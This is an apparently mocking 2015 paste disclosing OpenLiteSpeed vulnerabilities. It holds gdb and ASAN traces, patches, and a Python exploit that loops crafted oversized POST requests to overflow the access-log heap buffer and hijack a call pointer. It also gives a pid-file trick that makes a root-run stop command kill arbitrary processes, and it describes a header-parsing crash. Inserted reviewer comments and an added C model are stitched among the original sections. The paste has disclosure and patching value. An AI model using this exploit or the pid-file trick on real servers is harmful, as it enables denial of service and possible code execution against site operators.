analbleed
a guest
May 14th, 2015

Multiple Vulnerabilities in OpenLiteSpeed <= 1.3.10 - CVE-b045-73d a.k.a.
Analbleed

This is an irresponsible disclosure of the vulnerability, which will bring
large parts of the Internet to its knees - CVE-b045-73d a.k.a. Analbleed.
Obviously you can find the fancy logo for it above (officially approved by
the security community and industry worldwide). You can also listen to the
O.S.T. on the vuln's official website free of charge (as for now) here at
http://analbleed.com. If you are interested in purchasing t-shirts, cups,
stickers etc. visit our on-line shop on the same page. The special offer
also includes a vademecum covering all logo-branded vulns released so
far. You can now focus on studying their names, logos and more instead of
actually doing your own research.

http://en.wikipedia.org/wiki/LiteSpeed_Technologies_Inc.: May 2013: It is
used by 2% of all websites according to W3Techs,[9] making it the 4th most
popular web server.

Yup, whatever. Please, think of the kittens -
http://en.wikipedia.org/wiki/Every_time_you_masturbate..._God_kills_a_kitten

Ok, here comes the Analbleed pain...

source:
=======
int Appender::append(LoggingEvent *pEvent)
{
    char achBuf[9000];
    char *pMessage = achBuf;
    int len;
    if (!pEvent)
        return -1;
    Layout *pLayout;
    if (pEvent->m_pLayout)
        pLayout = pEvent->m_pLayout;
    else
        pLayout = m_pLayout;   // this path is taken, m_pLayout is on overwritten heap
    if (pLayout)
        len = pLayout->format(pEvent, pMessage, sizeof(achBuf));   // SIGSEGV here
    else
    {
        pMessage = (char *)pEvent->m_pMessageBuf;
        len = pEvent->m_iMessageLen;
    }
    return append(pMessage, len);
}


gdb (aftermath):
================
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7df6f0 --> 0x4f61d0 --> 0x4b9480 (<log4cxx::FileAppender::~FileAppender()>: mov QWORD PTR [rdi],0x4df2b0)
RCX: 0x2328 ('(#')
RDX: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE] [127.0.0.1:34844] Http request header is too big, abandon!\n")
RSI: 0x7fffffffc390 --> 0x1388
RDI: 0x77f660 ('!' <repeats 200 times>...)
RBP: 0x7df780 --> 0x4f6110 --> 0x4b90b0 (<log4cxx::Logger::~Logger()>: mov QWORD PTR [rdi],0x4df2b0)
RSP: 0x7fffffffa050 ("2015-04-14 13:13:26.670 [NOTICE] [127.0.0.1:34844] Http request header is too big, abandon!\n")
RIP: 0x4b8c37 (<log4cxx::Appender::append(log4cxx::LoggingEvent*)+55>: call QWORD PTR [r8+0x18])
R8 : 0x2121212121212121 ('!!!!!!!!')
R9 : 0x1
R10: 0x552cf656
R11: 0x0
R12: 0x1388
R13: 0x0
R14: 0x7742c0 --> 0x7e4530 --> 0x54534f5000000000 ('')
R15: 0x1
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0, pEvent=0x7fffffffc390) at appender.cpp:63
63 len = pLayout->format(pEvent, pMessage, sizeof(achBuf));

gdb-peda$ bt
#0 0x00000000004b8c37 in log4cxx::Appender::append (this=0x7df6f0, pEvent=0x7fffffffc390) at appender.cpp:63
#1 0x00000000004b8fe8 in log4cxx::Logger::vlog (this=0x7df780, level=level@entry=0x1388,
format=format@entry=0x4e5310 "[%s] Http request header is too big, abandon!", args=args@entry=0x7fffffffe418, no_linefeed=no_linefeed@entry=0x0)
at logger.cpp:111
#2 0x0000000000463876 in vnotice (args=0x7fffffffe418, format=<optimized out>, this=<optimized out>) at ../../src/log4cxx/logger.h:106
#3 HttpLog::notice (pLogger=<optimized out>, fmt=fmt@entry=0x4e5310 "[%s] Http request header is too big, abandon!") at httplog.cpp:381
#4 0x000000000047e1f4 in HttpSession::readToHeaderBuf (this=this@entry=0x774280) at httpsession.cpp:638
#5 0x000000000048422b in HttpSession::onReadEx (this=0x774280) at httpsession.cpp:1645
#6 0x0000000000474205 in NtwkIOLink::handleEvents (this=0x778a10, evt=<optimized out>) at ntwkiolink.cpp:310
#7 0x00000000004c4ccc in epoll::waitAndProcessEvents (this=0x7923f0, iTimeoutMilliSec=<optimized out>) at epoll.cpp:190
#8 0x0000000000469de2 in EventDispatcher::run (this=this@entry=0x7795c8) at eventdispatcher.cpp:219
#9 0x0000000000451450 in HttpServerImpl::start (this=0x7795a0) at httpserver.cpp:406
#10 0x0000000000457ca9 in HttpServer::start (this=<optimized out>) at httpserver.cpp:3216
#11 0x000000000044a700 in LshttpdMain::main (this=this@entry=0x779350, argc=argc@entry=0x1, argv=argv@entry=0x7fffffffe758) at lshttpdmain.cpp:930
#12 0x000000000044a672 in main (argc=argc@entry=0x1, argv=argv@entry=0x7fffffffe758) at main.cpp:109
#13 0x00007ffff5cc9ec5 in __libc_start_main (main=0x44a640 <main(int, char**)>, argc=0x1, argv=0x7fffffffe758, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe748) at libc-start.c:287
#14 0x000000000044be52 in _start ()

gdb-peda$ disas
Dump of assembler code for function log4cxx::Appender::append(log4cxx::LoggingEvent*):
0x00000000004b8c00 <+0>: push rbx
0x00000000004b8c01 <+1>: sub rsp,0x2330
0x00000000004b8c08 <+8>: mov rax,QWORD PTR fs:0x28
0x00000000004b8c11 <+17>: mov QWORD PTR [rsp+0x2328],rax
0x00000000004b8c19 <+25>: xor eax,eax
0x00000000004b8c1b <+27>: test rsi,rsi
0x00000000004b8c1e <+30>: je 0x4b8c82 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+130>
0x00000000004b8c20 <+32>: mov rbx,rdi
0x00000000004b8c23 <+35>: mov rdi,QWORD PTR [rsi+0x20]; 0x7fffffffc390 + 0x20 = 0x7fffffffc3b0 = 0x0 ?!?!?
0x00000000004b8c27 <+39>: test rdi,rdi
0x00000000004b8c2a <+42>: je 0x4b8c70 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+112>
0x00000000004b8c2c <+44>: mov r8,QWORD PTR [rdi] ; 0x77f660 -> '!' <repeats 200 times>...
0x00000000004b8c2f <+47>: mov ecx,0x2328
0x00000000004b8c34 <+52>: mov rdx,rsp
=> 0x00000000004b8c37 <+55>: call QWORD PTR [r8+0x18] ; SIGSEGV on $r8 + 0x18 = 0x2121212121212139
0x00000000004b8c3b <+59>: mov rcx,rsp
0x00000000004b8c3e <+62>: mov edx,eax
0x00000000004b8c40 <+64>: mov r8,QWORD PTR [rbx]
0x00000000004b8c43 <+67>: mov rsi,rcx
0x00000000004b8c46 <+70>: mov rdi,rbx
0x00000000004b8c49 <+73>: call QWORD PTR [r8+0x38]
0x00000000004b8c4d <+77>: mov rcx,QWORD PTR [rsp+0x2328]
0x00000000004b8c55 <+85>: xor rcx,QWORD PTR fs:0x28
0x00000000004b8c5e <+94>: jne 0x4b8c89 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+137>
0x00000000004b8c60 <+96>: add rsp,0x2330
0x00000000004b8c67 <+103>: pop rbx
0x00000000004b8c68 <+104>: ret
0x00000000004b8c69 <+105>: nop DWORD PTR [rax+0x0]
0x00000000004b8c70 <+112>: mov rdi,QWORD PTR [rbx+0x18]
0x00000000004b8c74 <+116>: test rdi,rdi
0x00000000004b8c77 <+119>: jne 0x4b8c2c <log4cxx::Appender::append(log4cxx::LoggingEvent*)+44>
0x00000000004b8c79 <+121>: mov rcx,QWORD PTR [rsi+0x10]
0x00000000004b8c7d <+125>: mov edx,DWORD PTR [rsi+0x18]
0x00000000004b8c80 <+128>: jmp 0x4b8c40 <log4cxx::Appender::append(log4cxx::LoggingEvent*)+64>
0x00000000004b8c82 <+130>: mov eax,0xffffffff
0x00000000004b8c87 <+135>: jmp 0x4b8c4d <log4cxx::Appender::append(log4cxx::LoggingEvent*)+77>
0x00000000004b8c89 <+137>: call 0x449720 <__stack_chk_fail@plt>
End of assembler dump.

gdb-peda$ p *(log4cxx::LoggingEvent*)$rsi
$5 = {
    m_level = 0x1388,
    m_flag = 0x0,
    m_pLoggerName = 0x7df7d4 "Example",
    m_pMessageBuf = 0x7fffffffc3d0 "[127.0.0.1:34846] Http request header is too big, abandon!",
    m_iMessageLen = 0x3a,
    m_pLayout = 0x0,
    m_timestamp = {
        tv_sec = 0x552cf656,
        tv_usec = 0xa5ec6
    }
}

gdb-peda$ p *pLayout
$5 = {
    <Duplicable> = {
        _vptr.Duplicable = 0x2121212121212121,
        m_sName = {
            <AutoStr> = {
                m_pStr = 0x2121212121212121 <error: Cannot access memory at address 0x2121212121212121>
            },
            members of AutoStr2:
            m_iStrLen = 0x21212121
        }
    },
    members of log4cxx::Layout:
    m_pUserData = 0x2121212121212121
}


ASAN:
=====
==24207==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62700000a100 at pc 0x7ffff5c1dd4c bp 0x7fffffffe0d0 sp 0x7fffffffe0a8
WRITE of size 2796 at 0x62700000a100 thread T0
#0 0x7ffff5c1dd4b in memmove (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x34d4b)
#1 0x488dda in AutoBuf::appendNoCheck(char const*, int) (/home/jbieber/ospeed/bin/openlitespeed+0x488dda)
#2 0x488adb in AccessLog::appendStr(char const*, int) /home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:652 // must be <= 4096
#3 0x48892b in AccessLog::log(HttpSession*) /home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:627 // logs referer and user-agent hdrs
#4 0x4a2de0 in HttpVHost::logAccess(HttpSession*) const /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:354
#5 0x4bb9ec in HttpSession::logAccess(int) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:184
#6 0x4c012e in HttpSession::closeConnection() /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1860
#7 0x4bbce3 in HttpSession::nextRequest() /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:266 // must be non keep-alive; best use HTTP/1.0
#8 0x4bf01c in HttpSession::handlerProcess(HttpHandler const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1371
#9 0x4bea64 in HttpSession::processURI(int) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1228
#10 0x4be070 in HttpSession::redirect(char const*, int, int) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1011
#11 0x4bf529 in HttpSession::sendHttpError(char const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1536
#12 0x4c49c9 in HttpSession::httpError(int, char const*) ../../src/http/httpsession.h:287
#13 0x4bfa62 in HttpSession::onReadEx() /home/jbieber/openlitespeed-1.3.8/src/http/httpsession.cpp:1692
#14 0x4ace2a in NtwkIOLink::onRead(NtwkIOLink*) /home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:745
#15 0x4ab7d5 in NtwkIOLink::handleEvents(short) /home/jbieber/openlitespeed-1.3.8/src/http/ntwkiolink.cpp:310
#16 0x52611c in epoll::waitAndProcessEvents(int) /home/jbieber/openlitespeed-1.3.8/src/edio/epoll.cpp:261
#17 0x49efeb in EventDispatcher::run() /home/jbieber/openlitespeed-1.3.8/src/http/eventdispatcher.cpp:219
#18 0x4769bc in HttpServerImpl::start() /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:406
#19 0x47e25f in HttpServer::start() /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3216
#20 0x473dff in LshttpdMain::main(int, char**) /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:930
#21 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
#22 0x7ffff4df1ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#23 0x471698 (/home/jbieber/ospeed/bin/openlitespeed+0x471698)

0x62700000a100 is located 0 bytes to the right of 12288-byte region [0x627000007100,0x62700000a100)
allocated by thread T0 here:
#0 0x7ffff5c3da96 in __interceptor_realloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54a96)
#1 0x539e51 in AutoBuf::allocate(int) /home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:42
#2 0x539dcd in AutoBuf::AutoBuf(int) /home/jbieber/openlitespeed-1.3.8/src/util/autobuf.cpp:26
#3 0x487f46 in AccessLog::AccessLog() /home/jbieber/openlitespeed-1.3.8/src/http/accesslog.cpp:446
#4 0x4a22a2 in HttpVHost::setAccessLogFile(char const*, int) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:194
#5 0x486837 in HttpLogSource::initAccessLog(XmlNode const*, long*) /home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:117
#6 0x4865d9 in HttpLogSource::initAccessLog(XmlNode const*, int) /home/jbieber/openlitespeed-1.3.8/src/http/httplogsource.cpp:69
#7 0x4a7a76 in HttpVHost::config(XmlNode const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2044
#8 0x4a8781 in HttpVHost::configVHost(XmlNode const*, char const*, char const*, char const*, char const*, XmlNode const*) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2307
#9 0x4a8a52 in HttpVHost::configVHost(XmlNode*) /home/jbieber/openlitespeed-1.3.8/src/http/httpvhost.cpp:2370
#10 0x47ca8b in HttpServerImpl::configVHosts(XmlNode const*) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2227
#11 0x47db52 in HttpServerImpl::configServer(int, XmlNode*) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2586
#12 0x47df45 in HttpServerImpl::initServer(XmlNode*, int&, int) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:2775
#13 0x47e7f1 in HttpServer::initServer(XmlNode*, int&, int) /home/jbieber/openlitespeed-1.3.8/src/main/httpserver.cpp:3415
#14 0x473354 in LshttpdMain::config() /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:629
#15 0x473aff in LshttpdMain::init(int, char**) /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:846
#16 0x473de2 in LshttpdMain::main(int, char**) /home/jbieber/openlitespeed-1.3.8/src/main/lshttpdmain.cpp:926
#17 0x47181f in main /home/jbieber/openlitespeed-1.3.8/src/main.cpp:109
#18 0x7ffff4df1ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memmove


poc:
====
#!/usr/bin/python

import sys
import struct
import socket

#
# openlitespeed v1.3.10:
#
# Kali:
# CANARY : ENABLED
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : disabled
#
# Ubuntu:
# CANARY : ENABLED
# FORTIFY : ENABLED
# NX : ENABLED
# PIE : disabled
# RELRO : Partial
#
# 00400000-0052e000 r-xp 00000000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 0072d000-0072e000 r--p 0012d000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 0072e000-00735000 rw-p 0012e000 fc:00 323891
# /home/jbieber/src/openlitespeed-1.3.10/ol/bin/openlitespeed
# 00735000-007b0000 rw-p 00000000 00:00 0
# [heap]
# 007b0000-009d7000 rw-p 00000000 00:00 0
# [heap]
# 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0
# [stack]
#
# .data base: 0x00000000007e1100
# .data size: 0x001e1100
#
# for kernel.randomize_va_space=1 one can use the .data segment which is
# holding the request
#
# for kernel.randomize_va_space=2 one needs to brute-force in order to find
# the address holding our request
#
# final = .data_addr (brute-forced addr, e.g.: 0x8ab8c4) + 0xe32 (offset)
#


def sendnokeepalive(r):
    h = 'localhost'
    p = 8088

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((h, p))
    s.send(r)
    r = s.recv(4096)
    s.close()

    return s


if __name__ == '__main__':
    daddr = int(sys.argv[1], 16) - 0x18 + 0xe32
    r8_offset_addr = struct.pack('<Q', daddr)
    print(" .data address: 0x%x") % daddr

    gadget = 0x4141414141414141
    final = struct.pack('<Q', gadget)
    print("gadget address: 0x%x") % gadget

    r1 = 'POST /w HTTP/0.9\n\rReferer: t\n\rUser-Agent: f\n\r\n\r'

    r2 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
    r2 += 'Referer: ' + final + '!' * 3679 + '\n'
    r2 += 'Content-Type: ' + '!' * 3740 + '\n'
    r2 += 'Content-Type: ' + '!' * 3935 + '\n'
    r2 += 'Content-Type: ' + '!' * 4157 + '\n'
    r2 += 'Content-Type: ' + '!' * 4117 + '\n\n'

    r3 = 'POST /' + '!' * 3609 + ' HTTP/1.0\n'
    r3 += 'Referer: ' + 'AAAAAAAA' + '!' * 1500
    r3 += r8_offset_addr + '!' * 2171 + '\n'
    r3 += 'Content-Type: ' + '!' * 3740 + '\n'
    r3 += 'Content-Type: ' + '!' * 3935 + '\n'
    r3 += 'Content-Type: ' + '!' * 4157 + '\n'
    r3 += 'Content-Type: ' + '!' * 4117 + '\n\n'

    # XXX: should be 5 or 6 reqs in total, 'while'
    # used for convenience during testing
    while(1):
        sendnokeepalive(r1)
        sendnokeepalive(r2)
        sendnokeepalive(r3)

    sys.exit(0)


patch:
======
--- accesslog.cpp.orig 2015-04-23 23:11:31.265510318 +0200
+++ accesslog.cpp 2015-04-23 23:54:48.921496609 +0200
@@ -643,7 +643,7 @@ int AccessLog::appendStr(const char *pSt
if (*pStr)
{
m_buf.append('"');
- if ((len > 4096) || (m_buf.capacity() <= len + 2))
+ if ((len > 4096) || (m_buf.capacity() <= len + 2) || (m_buf.size() + len) >= LOG_BUF_SIZE)
{
flush();
m_pAppender->append(pStr, len);
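Review bot: the new `(m_buf.size() + len) >= LOG_BUF_SIZE` term is the one that actually closes the hole; the two pre-existing terms compare `len` against 4096 and against the total `capacity()` and never account for the bytes already sitting in `m_buf` from earlier log lines, which is why the ASAN report shows the write starting exactly at the end of the 12288-byte region. Two things to confirm before merging: that `LOG_BUF_SIZE` really equals the allocation size of `m_buf` (otherwise compare against `m_buf.capacity()` directly), and that the closing quote presumably appended after this block is budgeted as well, since `m_buf.append('"')` has already run before the check and the `+ 2` in the old term suggests both quotes are meant to fit. A single `m_buf.size() + len + 2 > m_buf.capacity()` covers both points and makes the old capacity term redundant.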


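To make the effect of the added condition concrete, here is a small C model of the appendStr() decision, written for this page and not taken from OpenLiteSpeed. It assumes the buffer is 12288 bytes (the region size in the ASAN report) and keeps the 4096-byte per-field cap from the original test; the unchecked copy counts the bytes a real memmove would write past the end instead of corrupting memory, so several requests can be logged in a row and the two conditions compared.

```c
/* Model of AccessLog::appendStr() with the original and the patched condition.
 * Added example; buffer size and field cap are assumptions taken from the page. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#define LOG_BUF_SIZE 12288
#define MAX_FIELD     4096

typedef struct {
    char   data[LOG_BUF_SIZE];
    size_t size;      /* bytes buffered so far (AutoBuf::size())        */
    size_t overrun;   /* bytes a real memmove would write past the end  */
} logbuf_t;

typedef bool (*bypass_fn)(const logbuf_t *, size_t);

/* Original condition: looks only at the field length and the total capacity,
 * so it cannot see that earlier log lines already fill most of the buffer. */
bool bypass_orig(const logbuf_t *b, size_t len) {
    (void)b;
    return len > MAX_FIELD || LOG_BUF_SIZE <= len + 2;
}

/* Patched condition: also bypasses when the field would not fit behind size(). */
bool bypass_patched(const logbuf_t *b, size_t len) {
    return bypass_orig(b, len) || b->size + len >= LOG_BUF_SIZE;
}

static void flush(logbuf_t *b) { b->size = 0; }

/* Stand-in for AutoBuf::appendNoCheck(): copies what fits, counts the rest. */
static void append_nocheck(logbuf_t *b, const char *s, size_t len) {
    size_t room = LOG_BUF_SIZE - b->size;
    size_t fit  = len < room ? len : room;
    memcpy(b->data + b->size, s, fit);
    b->size    += fit;
    b->overrun += len - fit;
}

/* The fixed fields of a log line are modelled as bounds-checked appends. */
static void append_checked(logbuf_t *b, const char *s, size_t len) {
    if (b->size + len > LOG_BUF_SIZE) flush(b);
    append_nocheck(b, s, len);
}

/* Mirrors appendStr(): opening quote, the decision, then the raw append.
 * On bypass the buffer is flushed and the field goes straight to the appender. */
static void append_quoted(logbuf_t *b, const char *s, size_t len, bypass_fn bypass) {
    append_checked(b, "\"", 1);
    if (bypass(b, len)) flush(b);
    else                append_nocheck(b, s, len);
    append_checked(b, "\"", 1);
}

/* Log n requests whose referer and user-agent have the given lengths
 * (constructed '!' fields). Returns the number of bytes written past the end. */
size_t simulate(bypass_fn bypass, int n, size_t ref_len, size_t ua_len) {
    static char field[2 * MAX_FIELD];
    static logbuf_t b;
    static const char prefix[] =
        "127.0.0.1 - - [14/Apr/2015:13:13:26 +0200] \"GET / HTTP/1.0\" 200 0 ";
    memset(field, '!', sizeof field);
    memset(&b, 0, sizeof b);
    if (ref_len > sizeof field) ref_len = sizeof field;
    if (ua_len > sizeof field) ua_len = sizeof field;
    for (int i = 0; i < n; i++) {
        append_checked(&b, prefix, sizeof prefix - 1);
        append_quoted(&b, field, ref_len, bypass);
        append_checked(&b, " ", 1);
        append_quoted(&b, field, ua_len, bypass);
        append_checked(&b, "\n", 1);
    }
    return b.overrun;
}
```

With two requests carrying 4000-byte referer and user-agent values the original condition lets the second line run past the end of the buffer, while the patched one flushes first and never overruns.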
bonus features:
===============
#1:

Neither /home/wrecking/ospeed/bin/lswsctrl.open nor make install checks who
owns /tmp/lshttpd/ or what the pid file in it contains, so a user who owns
that directory can put any pid into lshttpd.pid and a root-run
lswsctrl.open stop will kill that process:

-- cut --
$ id
uid=1003(wrecking) gid=1003(ball) groups=1003(ball),4(adm),27(sudo)

$ ls -lah /tmp/lshttpd/
total 15M
drwxr-xr-x 4 wrecking ball 4.0K Apr 1 16:50 .
drwxrwxrwt 12 root root 15M Apr 1 16:53 ..
drwxr-xr-x 2 wrecking ball 4.0K Mar 6 16:42 bak_core
-rw-r--r-- 1 wrecking ball 6 Apr 1 16:50 lshttpd.pid
-rw-r--r-- 1 wrecking ball 446 Apr 1 16:18 .rtreport
-rw-r--r-- 1 wrecking ball 174 Apr 1 16:17 .status
drwx------ 12 wrecking ball 4.0K Mar 16 12:25 swap

$ sudo nc -l localhost -p 6666 -v &
[1] 25222
$ Listening on [localhost] (family 0, port 6666)

$ ps axuwww | grep local
root 25222 0.0 0.0 73288 2132 pts/0 S+ 13:37 0:00 sudo nc -l
localhost -p 6666
root 25223 0.0 0.0 11224 784 pts/0 S+ 13:37 0:00 nc -l
localhost -p 6666

$ echo 25222 > /tmp/lshttpd/lshttpd.pid

$ sudo /home/wrecking/ospeed/bin/lswsctrl.open stop
[OK] litespeed: stopped.

$
[1]+ Exit 140 sudo nc -l localhost -p 6666 -v
$
-- cut --


#2:
DoS while processing unknown headers. The PoC test case is currently >20 MB,
so we will spare the fd and won't send it ;] reading up on delta debugging
is in progress, sorry.

asan:
==3678==ERROR: AddressSanitizer: SEGV on unknown address 0x61d74683afcc (pc 0x0000004b477c sp 0x7fffd40198e0 bp 0x7fffd4019950 T0)
#0 0x4b477b in HttpReq::processHeaderLines() /home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543
#1 0x4b3990 in HttpReq::processHeader() /home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:224
#2 0x4bce44 in HttpSession::readToHeaderBuf() /home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:614
#3 0x4bf996 in HttpSession::onReadEx() /home/jbieber/openlitespeed-1.3.10/src/http/httpsession.cpp:1645
#4 0x4acf54 in NtwkIOLink::onRead(NtwkIOLink*) /home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:745
#5 0x4ab8ff in NtwkIOLink::handleEvents(short) /home/jbieber/openlitespeed-1.3.10/src/http/ntwkiolink.cpp:310
#6 0x527365 in epoll::waitAndProcessEvents(int) /home/jbieber/openlitespeed-1.3.10/src/edio/epoll.cpp:190
#7 0x49f0f7 in EventDispatcher::run() /home/jbieber/openlitespeed-1.3.10/src/http/eventdispatcher.cpp:219
#8 0x476abc in HttpServerImpl::start() /home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:406
#9 0x47e34b in HttpServer::start() /home/jbieber/openlitespeed-1.3.10/src/main/httpserver.cpp:3216
#10 0x473eff in LshttpdMain::main(int, char**) /home/jbieber/openlitespeed-1.3.10/src/main/lshttpdmain.cpp:930
#11 0x47191f in main /home/jbieber/openlitespeed-1.3.10/src/main.cpp:109
#12 0x7f78c3e41ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#13 0x471798 (/home/jbieber/ospeed/bin/openlitespeed+0x471798)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/jbieber/openlitespeed-1.3.10/src/http/httpreq.cpp:543 HttpReq::processHeaderLines()
==3678==ABORTING

source:
1.
int HttpReq::processHeaderLines()
{
    ...
    key_value_pair *pCurHeader = NULL;
    ...
    else
    {
        pCurHeader = newUnknownHeader();
        pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
    ...

2.
key_value_pair *newUnknownHeader()
{ return newKeyValueBuf(m_headerIdxOff); }

3.
key_value_pair *HttpReq::newKeyValueBuf(int &idxOff)
{
    char *p = NULL;
    int orgSize;
    int newSize;
    int used;
    if (idxOff == 0) // idxOff = m_headerIdxOff = 0x3e4
    {
        orgSize = 0;
        used = 0;
    }
    else
    {
        p = m_reqBuf.getPointer(idxOff); // m_pBuf + idxOff = 0x61d00000cc64 -> 0x74682e3500000028
        orgSize = *((int *)p); // 0x28
        used = *(((int *)p) + 1); // 0x74682e35
    }
    if (used == orgSize) // path not taken
    {
        ...
    }
    ++*(((int *)p) + 1); // wtf?!
    return (key_value_pair *)(p + sizeof(int) * 2) + used;
}


gdb:
Breakpoint 1, HttpReq::newKeyValueBuf (this=0x619000014fa0, idxOff=@0x619000015090: 0x3e4) at httpreq.cpp:723
723 // 0xa
gdb-peda$
p = 0x61d00000cc64 "(" // p fucked up for some reason
orgSize = 0x28
newSize = 0x0
used = 0x74682e35

$164 = 0x74682e35 // *(((int *)p) + 1)
$165 = 0x28 // *((int *)p)
$166 = 0x74682e36 // ++*(((int *)p) + 1)

Program received signal SIGSEGV, Segmentation fault.


fucked up patch:
--- src/http/httpreq.cpp.orig 2015-04-24 01:52:23.641459379 +0200
+++ src/http/httpreq.cpp 2015-04-24 17:17:50.169166351 +0200
@@ -49,6 +49,8 @@
#include <stdlib.h>
#include <unistd.h>

+#include <sys/mman.h>
+
#include <new>
#include <util/ssnprintf.h>

@@ -539,6 +541,11 @@ int HttpReq::processHeaderLines()
}
else
{
+ if (mprotect(&pCurHeader, sizeof(key_value_pair), PROT_READ|PROT_WRITE) == -1) {
+ LOG_INFO(("[%s] Status 500: failed on mprotect()!", getLogId()));
+ return SC_500;
+ }
+
pCurHeader = newUnknownHeader();
pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
pCurHeader->keyLen = skipSpace(pMark, pLineBegin) - pLineBegin;
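Review bot: the `mprotect()` call takes the address of the local pointer variable `pCurHeader` (a stack slot, `sizeof(key_value_pair)` bytes of it), not any memory that `newUnknownHeader()` is about to touch, and a stack address is practically never page-aligned, so the call fails with EINVAL on every request and this branch now answers SC_500 for any unknown header instead of preventing the crash. The fault is produced inside `newKeyValueBuf()`: `orgSize` and `used` are read back out of `m_reqBuf` at `m_headerIdxOff` and trusted as-is, and the gdb session shows `used` = 0x74682e35 (request bytes, ASCII "5.ht") before the `++*(((int *)p) + 1)` increment and the `(key_value_pair *)(p + sizeof(int) * 2) + used` return, so the returned pointer lands far outside the buffer and the `pCurHeader->keyOff = ...` store faults. The fix belongs in `newKeyValueBuf()`: reject `used > orgSize` and any index whose `key_value_pair` slot would end past the end of `m_reqBuf`, and trace why the index block at `idxOff` already contains request data when the function is entered (the gdb note says `p` is wrong on entry). With the mprotect gone, the `<sys/mman.h>` include from the first hunk goes too.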


#3:
In case you were wondering: yes, there are more bugs sitting out there. For
example, one that was found independently:
http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf

ThE EnD



Public Domain, 2015